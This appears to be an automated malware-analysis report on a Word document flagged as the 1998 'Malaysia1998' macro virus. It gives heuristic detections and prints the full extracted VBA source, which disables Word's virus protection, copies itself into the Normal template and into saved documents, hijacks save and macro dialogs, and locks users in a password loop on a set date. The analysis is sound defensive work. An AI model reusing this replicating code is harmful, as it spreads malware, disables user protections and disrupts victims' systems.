MALICIOUS
288
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macro virus markers and VBA macros, including an AutoOpen subroutine, indicating malicious intent. The 'ToolsMacro' subroutine prompts the user for a password, which is a common social engineering tactic to bypass security measures or trick users into enabling malicious content. The presence of these elements strongly suggests the document is designed to deliver a secondary payload.
Heuristics 6
-
ClamAV: Doc.Trojan.Preteced-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Preteced-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2854 bytes |
SHA-256: 3a6c223e193c3bfa63744fafdc3900c51dcf19e33b81daa2d4be79d0f3934b33 |
|||
|
Detection
ClamAV:
Doc.Trojan.Proteced-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Malaysia1998"
Sub AutoExec()
Options.VirusProtection = False
End Sub
Sub AutoOpen()
On Error GoTo err
Options.SaveNormalPrompt = False
DocumentToNormal
NormalTemplate.Save
err:
End Sub
Sub FileSave()
Application.EnableCancelKey = wdCancelDisabled
Trigger
On Error GoTo err
NormalToDocument
ActiveDocument.Save
err:
Application.EnableCancelKey = wdCancelInterrupt
End Sub
Sub FileSaveAs()
Attribute FileSaveAs.VB_Description = "Macro recorded 04/09/98 by Ng Bing Yew"
Attribute FileSaveAs.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Macro2"
Application.EnableCancelKey = wdCancelDisabled
Trigger
On Error GoTo err
NormalToDocument
Dialogs(wdDialogFileSaveAs).Show
err:
Application.EnableCancelKey = wdCancelInterrupt
End Sub
Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
titles = "Macro Proteced"
msg = "Please enter correct password in order to access the macro:"
Passcode = InputBox(msg, titles)
If Passcode = "Bad Logic" Then
Dialogs(wdDialogToolsMacro).Show
Else
MsgBox ("Access denied...")
End If
Application.EnableCancelKey = wdCancelDisabled
End Sub
Sub NormalToDocument()
On Error GoTo err
cur_doc = ActiveDocument.FullName
global_temp = NormalTemplate.FullName
macroname = "Malaysia1998"
Application.OrganizerCopy Source:=global_temp, _
Destination:=cur_doc, Name:=macroname, _
Object:=wdOrganizerObjectProjectItems
err:
End Sub
Sub DocumentToNormal()
On Error GoTo err
cur_doc = ActiveDocument.FullName
global_temp = NormalTemplate.FullName
macroname = "Malaysia1998"
Application.OrganizerCopy Source:=cur_doc, _
Destination:=global_temp, _
Name:=macroname, _
Object:=wdOrganizerObjectProjectItems
err:
End Sub
Sub Trigger()
On Error GoTo err
Todaydate = Date
If (Month(Todaydate) = 8) And (Day(Todaydate) = 30) Then
Do
cr = Chr(13) + Chr(10)
titles = "WM.MALAYSIA 1998"
msg1 = "You are lucky!!! You have met WM.MALAYSIA 1998!!!" + cr
msg2 = "WM.MALAYSIA 1998 is Malaysian's first MACRO VIRUS." + cr
msg3 = "It is written by a young college student -- BAD LOGIC." + cr
msg4 = cr + cr + cr + cr + "Please ENTER CORRECT password: "
msg = msg1 + msg2 + msg3 + msg4
response = InputBox(msg, titles)
Loop While (response <> "WM.MALAYSIA 1998")
End If
err:
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.